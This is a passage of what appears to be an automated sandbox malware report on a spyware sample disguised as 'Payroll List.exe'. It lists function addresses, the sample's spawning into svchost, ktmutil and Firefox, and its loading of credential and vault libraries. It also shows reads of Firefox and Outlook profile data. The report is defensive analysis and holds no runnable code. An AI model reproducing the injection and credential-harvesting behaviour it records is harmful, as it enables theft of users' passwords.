                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FF0E02_2_039FF0E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FF7B02_2_039FF7B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F16CC2_2_039F16CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DD5B02_2_039DD5B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F75712_2_039F7571
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FF43F2_2_039FF43F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039314602_2_03931460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395FB802_2_0395FB80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B5BF02_2_039B5BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0397DBF92_2_0397DBF9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FFB762_2_039FFB76
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DDAAC2_2_039DDAAC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03985AA02_2_03985AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039EDAC62_2_039EDAC6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FFA492_2_039FFA49
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F7A462_2_039F7A46
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B3A6C2_2_039B3A6C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039499502_2_03949950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395B9502_2_0395B950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039438E02_2_039438E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AD8002_2_039AD800
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03941F922_2_03941F92
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FFFB12_2_039FFFB1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FFF092_2_039FFF09
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03949EB02_2_03949EB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395FDC02_2_0395FDC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F1D5A2_2_039F1D5A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03943D402_2_03943D40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F7D732_2_039F7D73
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FFCF22_2_039FFCF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B9C322_2_039B9C32
                Source: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exeCode function: 4_2_0518A59A4_2_0518A59A
                Source: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exeCode function: 4_2_0518A5A34_2_0518A5A3
                Source: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exeCode function: 4_2_0518883B4_2_0518883B
                Source: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exeCode function: 4_2_05190F034_2_05190F03
                Source: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exeCode function: 4_2_0518A7C34_2_0518A7C3
                Source: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exeCode function: 4_2_051A92734_2_051A9273
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02E602C06_2_02E602C0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02E802746_2_02E80274
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02EA03E66_2_02EA03E6
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02DEE3F06_2_02DEE3F0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02E9A3526_2_02E9A352
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02E720006_2_02E72000
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02E981CC6_2_02E981CC
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02EA01AA6_2_02EA01AA
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02E941A26_2_02E941A2
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02E681586_2_02E68158
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02DD01006_2_02DD0100
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02E7A1186_2_02E7A118
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02DFC6E06_2_02DFC6E0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02DDC7C06_2_02DDC7C0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02DE07706_2_02DE0770
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02E047506_2_02E04750
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02E8E4F66_2_02E8E4F6
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02E924466_2_02E92446
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02E844206_2_02E84420
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02EA05916_2_02EA0591
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02DE05356_2_02DE0535
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02DDEA806_2_02DDEA80
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02E96BD76_2_02E96BD7
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02E9AB406_2_02E9AB40
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02E0E8F06_2_02E0E8F0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02DC68B86_2_02DC68B8
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02DE28406_2_02DE2840
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02DEA8406_2_02DEA840
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02EAA9A66_2_02EAA9A6
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02DE29A06_2_02DE29A0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02DF69626_2_02DF6962
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02E9EEDB6_2_02E9EEDB
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02DF2E906_2_02DF2E90
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02E9CE936_2_02E9CE93
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02DE0E596_2_02DE0E59
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02E9EE266_2_02E9EE26
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02DD2FC86_2_02DD2FC8
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02DECFE06_2_02DECFE0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02E5EFA06_2_02E5EFA0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02E54F406_2_02E54F40
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02E22F286_2_02E22F28
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02E00F306_2_02E00F30
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02E82F306_2_02E82F30
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02DD0CF26_2_02DD0CF2
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02E80CB56_2_02E80CB5
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02DE0C006_2_02DE0C00
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02DDADE06_2_02DDADE0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02DF8DBF6_2_02DF8DBF
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02DEAD006_2_02DEAD00
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02E7CD1F6_2_02E7CD1F
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02E812ED6_2_02E812ED
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02DFB2C06_2_02DFB2C0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02DE52A06_2_02DE52A0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02E2739A6_2_02E2739A
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02DCD34C6_2_02DCD34C
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02E9132D6_2_02E9132D
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02E970E96_2_02E970E9
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02E9F0E06_2_02E9F0E0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02DE70C06_2_02DE70C0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02E8F0CC6_2_02E8F0CC
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02DEB1B06_2_02DEB1B0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02EAB16B6_2_02EAB16B
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02E1516C6_2_02E1516C
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02DCF1726_2_02DCF172
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02E916CC6_2_02E916CC
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02E256306_2_02E25630
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02E9F7B06_2_02E9F7B0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02DD14606_2_02DD1460
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02E9F43F6_2_02E9F43F
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02EA95C36_2_02EA95C3
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02E7D5B06_2_02E7D5B0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02E975716_2_02E97571
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02E8DAC66_2_02E8DAC6
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02E25AA06_2_02E25AA0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02E7DAAC6_2_02E7DAAC
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02E81AA36_2_02E81AA3
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02E53A6C6_2_02E53A6C
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02E9FA496_2_02E9FA49
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02E97A466_2_02E97A46
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02E55BF06_2_02E55BF0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02E1DBF96_2_02E1DBF9
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02DFFB806_2_02DFFB80
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02E9FB766_2_02E9FB76
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02DE38E06_2_02DE38E0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02E4D8006_2_02E4D800
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02DE99506_2_02DE9950
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02DFB9506_2_02DFB950
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02E759106_2_02E75910
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02DE9EB06_2_02DE9EB0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02DA3FD26_2_02DA3FD2
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02DA3FD56_2_02DA3FD5
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02DE1F926_2_02DE1F92
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02E9FFB16_2_02E9FFB1
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02E9FF096_2_02E9FF09
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02E9FCF26_2_02E9FCF2
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02E59C326_2_02E59C32
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02DFFDC06_2_02DFFDC0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02E97D736_2_02E97D73
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02DE3D406_2_02DE3D40
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02E91D5A6_2_02E91D5A
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_00411FB06_2_00411FB0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_0040CEE76_2_0040CEE7
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_0040CEF06_2_0040CEF0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_0040D1106_2_0040D110
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_0040B1886_2_0040B188
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_0040B1906_2_0040B190
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_004156106_2_00415610
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_004138506_2_00413850
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_0042BBC06_2_0042BBC0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02A4E3446_2_02A4E344
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02A4E4636_2_02A4E463
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02A4CA9B6_2_02A4CA9B
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02A4D8C86_2_02A4D8C8
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02A4E8056_2_02A4E805
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: String function: 02E5F290 appears 105 times
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: String function: 02E27E54 appears 111 times
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: String function: 02E4EA12 appears 86 times
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: String function: 02E15130 appears 58 times
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: String function: 02DCB970 appears 280 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0392B970 appears 274 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03975130 appears 37 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 039AEA12 appears 86 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 039BF290 appears 105 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03987E54 appears 99 times
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: String function: 00146AC0 appears 42 times
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: String function: 0014F8A0 appears 35 times
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: String function: 0013EC2F appears 68 times
                Source: Payroll List.exe, 00000000.00000003.1427600863.00000000036F3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Payroll List.exe
                Source: Payroll List.exe, 00000000.00000003.1425867649.000000000384D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Payroll List.exe
                Source: Payroll List.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@9/3@11/8
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_0016CE7A GetLastError,FormatMessageW,0_2_0016CE7A
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_0015AB84 AdjustTokenPrivileges,CloseHandle,0_2_0015AB84
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_0015B134 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_0015B134
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_0016E1FD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_0016E1FD
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_00166532 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle,0_2_00166532
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_0017C18C CoInitializeSecurity,_memset,_memset,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket,0_2_0017C18C
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_0012406B CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_0012406B
                Source: C:\Users\user\Desktop\Payroll List.exeFile created: C:\Users\user\AppData\Local\Temp\aut8438.tmpJump to behavior
                Source: Payroll List.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\Payroll List.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: ktmutil.exe, 00000006.00000002.3291580399.00000000028C9000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 00000006.00000003.1937880728.0000000002872000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 00000006.00000003.1937880728.00000000028C9000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 00000006.00000002.3291580399.0000000002893000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 00000006.00000003.1937880728.0000000002893000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 00000006.00000003.1936456100.0000000002893000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 00000006.00000003.1936390356.00000000028A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: Payroll List.exeReversingLabs: Detection: 57%
                Source: unknownProcess created: C:\Users\user\Desktop\Payroll List.exe "C:\Users\user\Desktop\Payroll List.exe"
                Source: C:\Users\user\Desktop\Payroll List.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Payroll List.exe"
                Source: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exeProcess created: C:\Windows\SysWOW64\srdelayed.exe "C:\Windows\SysWOW64\srdelayed.exe"
                Source: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exeProcess created: C:\Windows\SysWOW64\ktmutil.exe "C:\Windows\SysWOW64\ktmutil.exe"
                Source: C:\Windows\SysWOW64\ktmutil.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\Payroll List.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Payroll List.exe"Jump to behavior
                Source: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exeProcess created: C:\Windows\SysWOW64\srdelayed.exe "C:\Windows\SysWOW64\srdelayed.exe"Jump to behavior
                Source: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exeProcess created: C:\Windows\SysWOW64\ktmutil.exe "C:\Windows\SysWOW64\ktmutil.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Payroll List.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\Payroll List.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\Desktop\Payroll List.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\Payroll List.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\Payroll List.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\Payroll List.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\Payroll List.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Payroll List.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\Payroll List.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\Payroll List.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\Payroll List.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: ktmw32.dllJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: Payroll List.exeStatic file information: File size 1212928 > 1048576
                Source: Payroll List.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: Payroll List.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: Payroll List.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: Payroll List.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Payroll List.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: Payroll List.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: Payroll List.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: eLiCpwzRIeWAs.exe, 00000004.00000000.1656145013.000000000061E000.00000002.00000001.01000000.00000005.sdmp, eLiCpwzRIeWAs.exe, 00000007.00000002.3291434953.000000000061E000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: Payroll List.exe, 00000000.00000003.1434270538.0000000003770000.00000004.00001000.00020000.00000000.sdmp, Payroll List.exe, 00000000.00000003.1427600863.00000000035D0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1639800247.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1734208595.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1734208595.0000000003900000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1641453907.0000000003700000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 00000006.00000003.1744250358.0000000002BF6000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 00000006.00000002.3292514897.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp, ktmutil.exe, 00000006.00000002.3292514897.0000000002F3E000.00000040.00001000.00020000.00000000.sdmp, ktmutil.exe, 